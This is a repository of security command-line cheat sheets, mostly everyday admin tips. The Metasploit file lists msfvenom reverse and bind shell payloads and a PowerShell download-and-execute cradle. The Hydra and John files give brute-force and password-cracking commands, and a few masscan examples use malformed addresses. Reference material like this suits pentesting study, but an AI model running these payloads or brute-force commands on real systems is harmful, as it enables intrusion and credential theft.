```
├── README.md
├── adb.md
├── airflow.md
├── androguard.md
├── android.md
├── ansible.md
├── avd.md
├── awk.md
├── curl.md
├── cut.md
├── dd.md
├── debian.md
├── django.md
├── docker.md
├── dot.md
├── dpkg.md
├── elf.md
├── emulator.md
├── fail2ban.md
├── find.md
├── gcloud.md
├── git.md
├── go.md
├── gobuster.md
├── gpg.md
├── grep.md
├── hacktheplanet.md
├── http.md
├── httpie.md
├── hydra.md
├── ip.md
├── iptables.md
├── java.md
├── john.md
├── journalctl.md
├── less.md
├── lldb.md
├── luks.md
├── massscan.md
├── mongo.md
├── mount.md
├── msf.md
├── mypy.md
├── mysql.md
├── nbtscan.md
├── netcat.md
├── nmap.md
├── objdump.md
├── openssl.md
├── pdf-parser.md
├── pdf.md
├── pip.md
├── powershell.md
├── psql.md
├── python.md
├── regex.md
├── sed.md
├── snort.md
├── sqlite.md
├── ssh.md
├── strings.md
├── svn.md
├── tar.md
├── tmux.md
├── useragent.md
├── vagrant.md
├── vim.md
├── wget.md
├── wordpress.md
├── wp.md
├── wpscan.md
├── xpath.md
├── yara.md
└── zeek.md
```

---
/README.md:

# commands-for-sec
Command-line tips for security work.

---
/adb.md:

# adb

**Kill the server:**
```
adb kill-server
```

**Install a package:**
```
adb install example.apk
```

---
/airflow.md:

# Airflow

These are the Airflow 1.x CLI forms; Airflow 2 renamed them to `airflow dags list`, `airflow dags trigger` and `airflow tasks test`.

**Run the web server:**
```
airflow webserver -p 8080
```

**Run the scheduler:**
```
airflow scheduler
```

**Test a single task of a DAG for a given execution date (runs it without recording state):**
```
airflow test DAG TASK 2017-03-18T18:00:00.0
```

**List DAGs:**
```
airflow list_dags
```

**Trigger a DAG run:**
```
airflow trigger_dag DAG
```

---
/androguard.md:

# Androguard

**Load an APK in an interactive shell:**
```
androlyze.py APK
```

**Show the signing certificate:**
```
androsign.py --all --show APK
```

**Show package information:**
```
androguard apkid APK
```

**Show the manifest:**
```
androguard axml APK
```

**Decode compiled resources:**
```
androguard arsc app.apk
```

---
/android.md:

# Android

**Dump APK contents, manifest and permissions (aapt):**
```
aapt l -a app.apk
```

**Convert a binary Android XML (e.g. the manifest) to plain XML with androguard:**
```
androaxml.py -i content/AndroidManifest.xml
```

**Check the signing certificate:**
```
keytool -printcert -file contents/META-INF/CERT.RSA
```

**Decompile with androguard:**
```
androdd.py -i FILENAME.apk -o OUTPUT_DIR
```

**Decompile with jadx:**
```
jadx -d out classes.dex
```

**Compare two APKs with androguard (ZLIB similarity, -n disables the cache):**
```
androsim.py -i FILENAME_1.apk FILENAME_2.apk -c ZLIB -n
```

---
/ansible.md:

# Ansible

`-s`/`--sudo` is the old spelling and has been removed from current Ansible; use `-b`/`--become` (with `-K` to prompt for the become password).

**Test connectivity and privilege escalation as a given user:**
```bash
$ ansible all -b -m ping -u USER --ask-become-pass
```

**Run a command directly on all hosts:**
```bash
$ ansible all -b -m shell -a 'apt-get install -y nginx'
```

**Run a playbook and prompt for the sudo password:**
```bash
$ ansible-playbook -b main.yml -K
```

**Create the skeleton (templates, tasks, handlers) for a role:**
```bash
$ ansible-galaxy init ROLENAME
```

---
/avd.md:

# Android Virtual Device

**List devices:**
```
emulator -list-avds
```

**Launch a device:**
```
emulator -avd foo
```

---
/awk.md:

# awk

**Select lines of a CSV file whose 5th field matches a pattern:**
```bash
awk -F ',' '$5 ~ /baddomain.com/' FILE
```

**Print specific fields of a pipe-separated file:**
```bash
awk -F '|' '{print $3" "$4}' FILE
```

**Tab-separated files (bash `$'\t'` quoting; plain `-F '\t'` also works, awk interprets the escape itself):**
```
awk -F $'\t' ...
```

---
/curl.md:

# Curl

**Resolve a shortened link: print the redirect target without following it:**
```bash
curl -s -o /dev/null -w "%{redirect_url}" URL
```

**HEAD request (`-I` already sends HEAD; adding `-X HEAD` is redundant):**
```bash
curl -I URL
```

**Follow redirects:**
```bash
curl -L URL
```

**Skip HTTPS certificate validation (testing only; this leaves the connection open to interception):**
```bash
curl -k URL
```

**Change the user agent:**
```
curl -A "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0; ms-office)" http://url.com
```

**POST form data:**
```
curl -d "param1=value1&param2=value2" -X POST http://localhost:3000/data
```

**POST a JSON body:**
```
curl -d '{"key1":"value1", "key2":"value2"}' -H "Content-Type: application/json" -X POST http://localhost:3000/data
```

**Pin DNS resolution to an IP (e.g. test a vhost before DNS is switched; the certificate is still checked against DOMAIN.TLD):**
```
curl https://DOMAIN.TLD --resolve "DOMAIN.TLD:443:IP_ADDRESS"
```

**Test whether a proxy is open:**
```
http_proxy=http://X.X.X.X:8080/ curl -4 -s http://nyc2.mirrors.digitalocean.com/tools/open_proxy_check.txt
```

**Upload a file (PUT):**
```sh
curl --upload-file
```

**Pass a parameter with URL encoding applied:**
```sh
curl --data-urlencode urlConfig=
```

**Send a request with HTTP basic auth (`-u`) and a raw body (`--data-binary`):**
```sh
curl -u --data-binary
```

---
/cut.md:

# Cut

**Drop the first 7 characters of each line (print from character 8 onward):**
```bash
cut -c 8- FILE
```

**Print only the first column of a CSV file:**
```bash
cut -d',' -f1 FILE.csv
```

---
/dd.md:

# dd

**Write an image to an SD card (`of=` is the whole device, not a partition; dd overwrites without asking, so check the device name first):**
```
dd bs=4M if=2018-11-13-raspbian-stretch.img of=/dev/sdX status=progress conv=fsync
```

**Image a raw device over SSH to another machine, compressing the stream in transit (`-C`). `conv=noerror,sync` keeps going on read errors and pads the bad blocks with zeros, so hash the result on both sides afterwards.**

```sh
dd if=/dev/rdisk0s1s2s bs=65536 conv=noerror,sync | ssh -C user@ "cat >/tmp/image.dd"
```

---
/debian.md:

# Debian

Release numbers and codenames (which one is currently stable or testing moves with each release; check https://www.debian.org/releases/):

* 8 : Jessie
* 9 : Stretch
* 10 : Buster
* 11 : Bullseye
* 12 : Bookworm
* 13 : Trixie
* Sid : unstable

---
/django.md:

# Django

**Run the development server:**
```
python manage.py runserver
```

**Create a superuser:**
```
python manage.py createsuperuser
```

---
/docker.md:

# Docker

**List running containers:**
```
docker ps
```

**List all containers:**
```
docker ps -a
```

**Stop a container (`kill` sends SIGKILL; `docker stop` sends SIGTERM first):**
```
docker kill d4
```

**Remove a container:**
```
docker rm d4
```

**List images:**
```
docker images
```

**Delete an image:**
```
docker rmi d4
```

**List the ports forwarded for a container:**
```
docker port d4
```

**Run a container interactively:**
```
docker run -it
```

**MySQL for development in a container (root password `root`; do not expose this beyond localhost):**
```
docker run -d --name mysql -p 3306:3306 -e MYSQL_ROOT_PASSWORD=root -v PATH:/var/lib/mysql mysql
```

**Mongo for development in a container:**
```
docker run -d -p 27017:27017 -v PATH:/data/db --name mongodb mongo:latest
```

**Get a container's IP address:**
```
docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' CONTAINER
```

---
/dot.md:

# Dot

**Convert dot to PNG:**

```
dot file.dot -Tpng -o image.png
```

---
/dpkg.md:

# dpkg

**List the files of an installed package:**
```
dpkg-query -L libre2-3
```

**Find which package a file belongs to:**

```
dpkg -S FILE
```

---
/elf.md:

# ELF

**Read symbol tables (`-D` alone prints nothing; add it to `-s` to read the dynamic symbols only):**
```
readelf -s FILE
```

---
/emulator.md:

# Android Emulator

**List devices:**
```
emulator -list-avds
```

**Launch one with hardware acceleration:**
```
emulator -avd "Pixel_2" -gpu host
```

**Launch with a writable system partition:**
```
emulator -avd NAME -writable-system
```

---
/fail2ban.md:

# fail2ban

**Check enabled jails:**
```
sudo fail2ban-client status
```

**Check the state of a jail (banned IPs, filter hits):**
```
sudo fail2ban-client status apache
```

**Unban an IP:**
```
sudo fail2ban-client set apache unbanip 111.111.111.111
```

---
/find.md:

# Find

**Delete files (`-delete` is built in; `-exec rm` forks a process per file):**

```sh
find . -iname "*.nope" -delete
find . -type f -name "tecmint.txt" -exec rm -f {} \;
find . -type f -name "*.txt" -exec rm -f {} \;
find . -type f -name "*.mp3" -exec rm -f {} \;
```

**Find files modified on a specific day:**
`find . -type f -newermt 2007-06-07 ! -newermt 2007-06-08`

**Find files whose content (mtime) and metadata (ctime) both changed in the past 5 days:**

```sh
find / -mtime -5 -ctime -5
```

**Find files modified in the last minute:**

```sh
find / -mmin -1
```

**Find SUID/SGID files (`-perm /` matches if any of the listed bits is set):**

```sh
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
find / -perm /u=s
find / -perm /g=s
```

**Find files by exact mode, or by a permission bit:**

```sh
find / -perm 2644            # exactly 2644 (SGID, rw-r--r--)
find / -perm 1551            # exactly 1551 (sticky bit, r-xr-x--x)
find . -type f -perm 0777 -print   # world-readable, writable and executable
find / -type f ! -perm 777   # everything that is not 0777
find / -perm /u=r            # owner-readable (any "r" bit for the user)
find / -perm /a=x            # executable by anyone
```

**Find all 0777 files and reset them to 644 (this also strips the execute bit, so check the list first):**

```sh
find / -type f -perm 0777 -print -exec chmod 644 {} \;
```

**Send the output of find to a file (quote the glob so the shell does not expand it):**

```sh
find / -name "*.mp3" -fprint nameoffiletoprintto
```

**Find a file and run a command on it:**

```sh
# Search and edit a file at the same time
find / -name filename -exec nano '{}' \;
```

**Find a file owned by a user:**

```sh
find / -user root -name file.txt
```

**Find all files owned by a group:**

```sh
find /home -group developer
```

**Find particular files of a user:**

```sh
find /home -user tecmint -iname "*.txt"
```

**Find files between 50 MB and 100 MB:**

```sh
find / -size +50M -size -100M
```

**Find all empty files:**

```sh
find /tmp -type f -empty
```

**Find all empty directories:**

```sh
find /tmp -type d -empty
```

**Find all hidden files:**

```sh
find /tmp -type f -name ".*"
```
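The SUID/SGID one-liners above list what is set today; on an incident the useful question is what changed. The following script is an added example, not part of the original cheat sheet: it snapshots the set of setuid/setgid files into a baseline and reports entries that appeared (or changed mode) since. The function names and the `MODE PATH` line format are this example's own conventions; it relies on GNU `find -printf` and `comm`.

```sh
#!/bin/sh
# Added example (not from the cheat sheet): baseline and diff the set of
# SUID/SGID files on a host. list_setid/new_setid and the "MODE PATH"
# line format are this example's own choices, not find(1) features.
# Needs GNU find (-printf); -xdev keeps the walk on one filesystem.

# list_setid ROOT: one "MODE PATH" line per regular file below ROOT with
# the setuid (4000) or setgid (2000) bit set, sorted so comm(1) can use it.
list_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -printf '%m %p\n' 2>/dev/null | LC_ALL=C sort
}

# new_setid BASELINE ROOT: lines in the live listing of ROOT that are not
# in BASELINE (a file written earlier by list_setid). A binary whose mode
# changed shows up as well, because the whole line differs.
new_setid() {
    list_setid "$2" | LC_ALL=C comm -13 "$1" -
}

# Typical use:
#   list_setid / > /var/lib/setid.baseline      # at install time
#   new_setid /var/lib/setid.baseline /          # during triage; no output = no change
```

Keep the baseline somewhere an attacker with a user shell cannot edit, and refresh it after package upgrades, which legitimately add or replace setuid binaries.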
---
/gcloud.md:

# Google Cloud

**Set the project:**
```
gcloud config set project PROJECT_ID
```

**See the configuration:**
```
gcloud config list
```

**Deploy:**
```
gcloud app deploy
```

**List enabled APIs:**
```
gcloud services list
```

**Use your own account as application default credentials during development:**
```
gcloud auth application-default login
```

---
/git.md:

# git

**Sync a fork with its upstream repository:**
```
git remote add upstream https://github.com/ORIGINAL_OWNER/ORIGINAL_REPOSITORY.git
git fetch upstream
git checkout master
git merge upstream/master
```

**Stage hunks selectively:**
```
git add -p
```

**Interactively rewrite the last 3 commits:**
```
git rebase -i HEAD~3
```

**Check logs (reflog also shows commits no branch points to any more):**
```
git log
git reflog
```

**Add/remove remote repos (`git://` is unauthenticated and unencrypted; prefer `https://` or SSH):**
```
git remote add NAME git://
git remote remove NAME
```

**Use a specific private key for clone/pull/push:**
```
ssh-agent bash -c 'ssh-add /somewhere/yourkey; git clone git@github.com:user/project.git'
```

---
/go.md:

# Go

* Add missing modules to go.mod and drop unused ones: `go mod tidy`

---
/gobuster.md:

# Gobuster

**Enumerate directories:**
```
gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt
```

**DNS mode (subdomain brute force):**
```
gobuster dns -d mysite.com -t 50 -w common-names.txt
```

**Show resolved IPs in DNS mode:**
```
gobuster dns -d google.com -w ~/wordlists/subdomains.txt -i
```

**vhost mode:**
```
gobuster vhost -u https://mysite.com -w common-vhosts.txt
```

**dir mode with a custom Host header (a vhost behind a shared IP):**
```
gobuster dir -w lists.txt -u "TARGET" -H "Host: google.com"
```

---
/gpg.md:

# GPG

**Send a key to a key server:**
```
gpg --send-key 123456
```

**Receive a key from a server:**
```
gpg --keyserver certserver.pgp.com --recv-keys 1234556
```

**Sign a file with a detached signature:**
```
gpg --output FILE.sig --detach-sign FILE
```

**Verify a signature:**
```
gpg --verify FILE.sig FILE
```

**Export a public key:**
```
gpg --export -a "User Name" > public.key
```

**Export a secret key (ASCII-armored; handle the output as you would the key itself):**
```
gpg --export-secret-keys -a Username
```

**List signatures:**
```
gpg --list-sigs
```

**Sign a key:**
```
gpg --sign-key --ask-cert-level someone@example.com
```
(Then send the key to the server if you want to publish the signature.)

**Import public keys from another keyring:**
```
gpg --export --keyring=~/.gnupg.old/pubring.gpg | gpg --import
```

**Encrypt and sign a text file:**
```
gpg --encrypt --sign --armor -r person@email.com name_of_file
```

**Encrypt for the recipient and yourself, signing with a specific key:**
```
gpg --encrypt --sign --armor -r TARGET -r MYEMAIL --local-user MYEMAIL FILE
```

---
/grep.md:

# Grep

**Search for hashtags:**
```
grep -o '#[[:alnum:]]*' file
```

**Search for IPv4 addresses (loose: any four 1-3 digit groups, so 999.999.999.999 matches too):**
```
$ grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" file.txt
```

**Search for an email address:**
```
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt
```

---
/hacktheplanet.md:

(ASCII-art banner reading "hack the planet"; its layout was lost in extraction.)

---
/http.md:

# HTTP

HTTP status codes:
* **200** : OK
* **201** : Created
* **301** : Moved Permanently
* **302** : Found
* **400** : Bad Request
* **401** : Unauthorized (authentication required)
* **403** : Forbidden
* **404** : Not Found
* **406** : Not Acceptable
* **424** : Failed Dependency
* **500** : Internal Server Error
* **502** : Bad Gateway
* **503** : Service Unavailable
* **504** : Gateway Timeout
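The IPv4 pattern in grep.md above accepts any four 1-3 digit groups, which is fine for a quick look but pulls version strings and impossible addresses out of real logs. The script below is an added example, not part of the original cheat sheet: it runs the cheat sheet's loose pattern and a strict 0-255 variant over a few constructed log lines so the difference is visible, and extracts e-mail addresses the same way. The sample lines, the `OCTET` pattern and the function names are this example's own; `\b` and `-o` are GNU grep features.

```sh
#!/bin/sh
# Added example (not from the cheat sheet): compare the loose IPv4 regex
# with a strict one, and pull e-mail addresses, over constructed log text.
# Function names, OCTET and SAMPLE_LOG are this example's own.

# Constructed sample lines, not a real log.
SAMPLE_LOG='Jan 10 10:00:01 gw sshd[1]: Accepted password for root from 192.168.1.10 port 51234
Jan 10 10:00:02 gw app: upstream 10.0.0.256 unreachable
Jan 10 10:00:03 gw app: loaded build 999.1.1.1
Jan 10 10:00:04 gw app: contact admin@example.com or ops@mail.example.org
Jan 10 10:00:05 gw sshd[2]: Failed password for admin from 8.8.8.8 port 22'

# One decimal octet, 0-255, with no leading zeros.
OCTET='(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])'

# The cheat sheet's pattern: anything shaped like d.d.d.d (stdin -> unique, sorted).
extract_ipv4_loose() {
    grep -E -o '([0-9]{1,3}\.){3}[0-9]{1,3}' | LC_ALL=C sort -u
}

# Strict version: every octet in range, and word boundaries on both ends so
# "10.0.0.256" is rejected outright instead of being trimmed to "10.0.0.25".
extract_ipv4() {
    grep -E -o "\b($OCTET\.){3}$OCTET\b" | LC_ALL=C sort -u
}

# E-mail addresses; the TLD length is left open (.museum, .technology, ...).
extract_emails() {
    grep -E -o '\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b' | LC_ALL=C sort -u
}

# Usage:  printf '%s\n' "$SAMPLE_LOG" | extract_ipv4
```

On the sample above the loose pattern returns four "addresses", the strict one only 192.168.1.10 and 8.8.8.8. Neither tells a dotted version number such as 1.2.3.4 from an address; for that, check the candidates against the field they came from.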
-------------------------------------------------------------------------------- /httpie.md: -------------------------------------------------------------------------------- 1 | # httpie 2 | 3 | **HTTP query focing the IP address:** 4 | ``` 5 | http 127.0.0.1/whatever Host:www.foo.com 6 | ``` 7 | 8 | **Set HTTP headers:** 9 | ``` 10 | http example.org User-Agent:Bacon/1.0 'Cookie:valued-visitor=yes;foo=bar' \ 11 | X-Foo:Bar Referer:http://httpie.org/ 12 | ``` 13 | 14 | **Disable certificate checking:** 15 | ``` 16 | http --verify=no URL 17 | ``` 18 | -------------------------------------------------------------------------------- /hydra.md: -------------------------------------------------------------------------------- 1 | # Hydra 2 | 3 | **SSH Bruteforce:** 4 | 5 | ```sh 6 | hydra -L users.txt -P pass.txt IP ssh 7 | ``` 8 | 9 | **FTP Bruteforce:** 10 | 11 | ```sh 12 | hydra -l user -P passlist.txt ftp://192.168.0.1 13 | ``` 14 | 15 | **IMAP Bruteforce:** 16 | 17 | ``` 18 | hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN 19 | ``` 20 | 21 | **POP3 Bruteforce:** 22 | ``` 23 | hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5 24 | ``` 25 | 26 | **HTTP POST form bruteforce:** 27 | ``` 28 | hydra -L users.txt -P pass.txt -s http-post-form "/users/sign_in:user[email]=^USER^&user[password]=^PASS^&user[Commit]=Log inn:Invalid Email or password. 
29 | ``` 30 | 31 | **SMTP Bruteforce:** 32 | 33 | ``` 34 | hydra -P /usr/share/wordlistsnmap.lst smtp -V 35 | ``` 36 | -------------------------------------------------------------------------------- /ip.md: -------------------------------------------------------------------------------- 1 | # ip 2 | 3 | **Change Mac address:** 4 | ``` 5 | ip link set dev INTERFACE down 6 | ip link set dev INTERFACE address XX:XX:XX:XX:XX:XX 7 | ip link set dev INTERFACE up 8 | ``` 9 | -------------------------------------------------------------------------------- /iptables.md: -------------------------------------------------------------------------------- 1 | # iptables 2 | 3 | **See all rules:** 4 | ``` 5 | iptables -L 6 | ``` 7 | 8 | **List rules number:** 9 | ``` 10 | iptables -L --line-number 11 | ``` 12 | 13 | **Delete a specific rule:** 14 | ``` 15 | iptables -D INPUT 1 16 | ``` 17 | 18 | **Flush a chain:** 19 | ``` 20 | iptables -F INPUT 21 | ``` 22 | 23 | -------------------------------------------------------------------------------- /java.md: -------------------------------------------------------------------------------- 1 | # Java 2 | 3 | **Change java default version on Debian:** 4 | ```bash 5 | sudo update-alternatives --config java 6 | ``` 7 | -------------------------------------------------------------------------------- /john.md: -------------------------------------------------------------------------------- 1 | # JohnTheRipper 2 | 3 | 4 | ```sh 5 | john --wordlist=dict.txt passwd 6 | john --show passwd 7 | john --restore 8 | unshadow passwd shadow > unshadowed.txt 9 | john --wordlist=dict.txt unshadowed.txt 10 | ``` 11 | -------------------------------------------------------------------------------- /journalctl.md: -------------------------------------------------------------------------------- 1 | # journalctl 2 | 3 | **Check for a specific unit:** 4 | ``` 5 | journalctl -u nginx.service 6 | ``` 7 | 8 | **Limit in time:** 9 | ``` 10 | journalctl --since 
09:00 --until "1 hour ago" 11 | journalctl -u nginx.service --since today 12 | ``` 13 | -------------------------------------------------------------------------------- /less.md: -------------------------------------------------------------------------------- 1 | # less 2 | 3 | **Show binary file (and not less interpretation)** 4 | ``` 5 | less -L file 6 | ``` 7 | -------------------------------------------------------------------------------- /lldb.md: -------------------------------------------------------------------------------- 1 | # lldb 2 | 3 | * Launch process: `process launch --stop-at-entry` 4 | * Disassemble at a specific address: `d -s 0x100001080` 5 | * Set breakpoint at an address: `br s -a 0x10000` 6 | * Print data: (b for byte, w for word, c for char, x for hex, s for string): `x/40bx $rdx` 7 | * Step in: `step` or `s` 8 | * Step over: `next` or `n` 9 | * Print variable value: `p $r12` 10 | * Print all registries values: `re r -f i` 11 | * List binary and libraries loaded : `image list` 12 | * List sections : `image dump sections` 13 | 14 | -------------------------------------------------------------------------------- /luks.md: -------------------------------------------------------------------------------- 1 | # LUKS 2 | 3 | **Open encrypted device** : 4 | ``` 5 | cryptsetup --type luks open /dev/sdb1 encrypted 6 | ``` 7 | 8 | **Close encrypted drive:** 9 | ``` 10 | cryptsetup close encrypted 11 | ``` 12 | 13 | **Format drive:** 14 | ``` 15 | cryptsetup luksFormat -c aes-xts-plain64 --key-size 512 --hash sha512 --use-urandom /dev/sdb1 16 | ``` 17 | -------------------------------------------------------------------------------- /massscan.md: -------------------------------------------------------------------------------- 1 | # Massscan 2 | 3 | **Target Specification** 4 | ``` 5 | # Target specification 6 | masscan 10.0.0.1 7 | masscan 10.0.0.0/24 192.168.1.0/24 8 | 9 | # Exclude IP file 10 | masscan 10.0.0.1/24 --excludeFile 11 | 12 | # Exclude a 
single IP from the scan 13 | masscan 180.215.0.0/16 --exclude=180.215.122.120 14 | ``` 15 | 16 | **Port Specification** 17 | ``` 18 | # Port specification 19 | masscan 10.0.0.0.1 -p 80 20 | masscan 10.0.0.0.1 -p 0-65535 21 | masscan 10.0.0.0.1 -p 80,443 22 | 23 | # UDP Scan 24 | masscan 10.0.0.0.1 -pU 53 25 | ``` 26 | 27 | **Timing and Performance** 28 | ``` 29 | # Used to scan in offline mode 30 | # It does not send any traffic but just estimate the time length 31 | masscan 0.0.0.0/24 --offline 32 | 33 | # Using the rate to send X packets per second 34 | masscan 10.0.0.1/24 --rate 10000 35 | 36 | 37 | # Get banners from services (only few protocols supported) 38 | # Problem is that masscan uses his own TCP/IP stack so when the local system 39 | # received a SYN-ACK from the probed target, it responds with a TST packet that 40 | # kills the connection before the banner information can be grabbed. 41 | # You can use --source-ip to assign another IP to prevent 42 | masscan 10.0.0.1 --banners 43 | 44 | # Assign masscan to another IP 45 | masscan 10.0.0.1 --source-ip 192.168.1.200 46 | 47 | # Include a ping 48 | masscan 10.0.0.1 --ping 49 | 50 | # Change the default user agent 51 | masscan 10.0.0.1 --http-user-agent 52 | 53 | # Report only open ports 54 | masscan 10.0.0.1 --open-only 55 | 56 | # Save sent packet in PCAP 57 | masscan 10.0.0.1 --pcap 58 | 59 | # Print packets in terminal (ok in low rate but RIP terminal with high rates) 60 | masscan 10.0.0.1 --packet-trace 61 | ``` 62 | 63 | **Output** 64 | ``` 65 | # Quick port identification 66 | # - Subnet target 67 | # - Port range 68 | # - High speed 69 | masscan 10.1.1.1/24 -p 0-65535 --rate 1000000 --open-only --http-user-agent \ 70 | "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"\ 71 | -oL "output.txt" 72 | 73 | # Multiple targets specific scan 74 | # - Known ports 75 | # - Fast rate 100.000 76 | # - Banner grabbing and another source IP 77 | # - Only open ports 78 | # - Modified 
user-agent 79 | masscan -p 80,433 --rate 100000 --banners --open-only\ 80 | --http-user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"\ 81 | --source-ip 192.168.100.200 -oL "output.txt" 82 | 83 | # TOP 20 ports scanning 84 | # Modified user-agent 85 | # Medium speed 86 | masscan -p 21,22,23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080\ 87 | --http-user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"\ 88 | --rate 100000 --oL "output.txt" 89 | 90 | # In some cases, masscan can be better than nmap 91 | # For example, when searching for a big range on some ports only 92 | # (Internal pentest for example) you can do multiple iterations of scans 93 | # XML output are interesting for db_import in metasploit 94 | sudo masscan -p 22 --rate 2000 -oX output_port_22.xml 95 | ``` 96 | -------------------------------------------------------------------------------- /mongo.md: -------------------------------------------------------------------------------- 1 | # mongo 2 | 3 | **Connect to remote DB:** 4 | ``` 5 | mongo -u -p 6 | ``` 7 | 8 | **List databases:** 9 | ``` 10 | show dbs 11 | ``` 12 | 13 | **List collections**: 14 | ``` 15 | show collections 16 | ``` 17 | 18 | **Use a database:** 19 | ``` 20 | use DBNAME 21 | ``` 22 | 23 | **Show content of the collection cars**: 24 | ``` 25 | db.cars.find() 26 | ``` 27 | 28 | **Drop the collection houses** 29 | ``` 30 | db.houses.drop() 31 | ``` 32 | 33 | **Dump database:** 34 | ``` 35 | mongodump -d -o 36 | ``` 37 | 38 | **Restore dump:** 39 | ``` 40 | mongorestore -d 41 | ``` 42 | 43 | **Run query in mongo legacy shell:** 44 | ``` 45 | mongo DBNAME --eval "QUERY" 46 | ``` 47 | -------------------------------------------------------------------------------- /mount.md: -------------------------------------------------------------------------------- 1 | # Mount 2 | 3 | **Mount CIFS (you need cifs-utils):** 4 | ```bash 5 | mount -t 
cifs -o username=robert,password=foobar123 //192.168.1.11/videos /mnt/vids 6 | ``` 7 | 8 | **Mount Windows drive image for forensic analysis** 9 | ```bash 10 | mount -o ro,loop,shows_sys_files,streams_interface=windows img.dd /mnt 11 | ``` 12 | 13 | **Mount a specific partition of a Windows drive image:** 14 | ```bash 15 | mount -o ro,loop,shows_sys_files,streams_interface=windows,offset=32256 img.dd /mnt 16 | ``` 17 | -------------------------------------------------------------------------------- /msf.md: -------------------------------------------------------------------------------- 1 | # Metasploit 2 | 3 | ## MSFVenom shells: 4 | 5 | ### Linux 6 | 7 | Linux Meterpreter reverse shell x86 multi stage: 8 | 9 | ```sh 10 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf 11 | ``` 12 | 13 | Linux Meterpreter bind shell x86 multi stage: 14 | 15 | ```sh 16 | msfvenom -p linux/x86/meterpreter/bind_tcp RHOST= LPORT= -f elf > shell.elf 17 | ``` 18 | 19 | Linux bind shell x64 single stage: 20 | 21 | ```sh 22 | msfvenom -p linux/x64/shell_bind_tcp RHOST= LPORT= -f elf > shell.elf 23 | ``` 24 | 25 | Linux reverse shell x64 single stage: 26 | 27 | ```sh 28 | msfvenom -p linux/x64/shell_reverse_tcp RHOST= LPORT= -f elf > shell.elf 29 | ``` 30 | 31 | ### Windows 32 | 33 | Windows Meterpreter http reverse shell: 34 | 35 | ```sh 36 | msfvenom -p windows/meterpreter_reverse_http LHOST= LPORT= HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe 37 | ``` 38 | 39 | Windows Meterpreter bind shell: 40 | 41 | ```sh 42 | msfvenom -p windows/meterpreter/bind_tcp RHOST= LPORT= -f exe > shell.exe 43 | ``` 44 | 45 | Windows CMD Multi Stage: 46 | 47 | ```sh 48 | msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell.exe 49 | ``` 50 | 51 | Windows CMD Single Stage: 52 | 53 | ```sh 54 | msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > 
shell.exe 55 | ``` 56 | 57 | Windows add user: 58 | 59 | ```sh 60 | msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe 61 | ``` 62 | 63 | Windows shell which doesn't break the application for a x86 architecture: 64 | 65 | ```sh 66 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -f exe -a x86 --platform windows -o sploit.exe 67 | ``` 68 | 69 | 70 | Windows Exec Nishang Powershell in python 71 | 72 | ```sh 73 | msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f python 74 | ``` 75 | 76 | Bad characters shikata_ga_nai: 77 | 78 | ```sh 79 | msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST= LPORT= -f c -e x86/shikata_ga_nai -b "\x04\xA0" 80 | ``` 81 | 82 | Bad characters fnstenv_mov: 83 | 84 | ```sh 85 | msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST= LPORT= -f c -e x86/fnstenv_mov -b "\x04\xA0" 86 | ``` 87 | 88 | ### Misc 89 | 90 | Python Shell: 91 | 92 | ```sh 93 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py 94 | ``` 95 | 96 | Bash Shell: 97 | 98 | ```sh 99 | msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh 100 | ``` 101 | 102 | Perl Shell: 103 | 104 | ```sh 105 | msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl 106 | ``` 107 | 108 | ASP Meterpreter Shell: 109 | 110 | ```sh 111 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp 112 | ``` 113 | 114 | PHP Reverse Shell: 115 | 116 | ```sh 117 | msfvenom -p php/reverse_php LHOST= LPORT= -f raw > phpreverseshell.php 118 | ``` 119 | 120 | To get multiple session on a single multi/handler, you need to set the 121 | ExitOnSession option to false and run the exploit -j instead of just the 122 | exploit. 
For example, for the windows/meterpreter/reverse_tcp payload:

```
msf> use exploit/multi/handler
msf> set payload windows/meterpreter/reverse_tcp
msf> set LHOST IP
msf> set LPORT PORT
msf> set ExitOnSession false
msf> exploit -j
```
-------------------------------------------------------------------------------- /mypy.md: --------------------------------------------------------------------------------
# Mypy

Install missing type stubs:
```
mypy --install-types
```

Check but ignore import errors:
```
mypy --ignore-missing-imports PATH
```
-------------------------------------------------------------------------------- /mysql.md: --------------------------------------------------------------------------------
# MySQL

**Connect**:
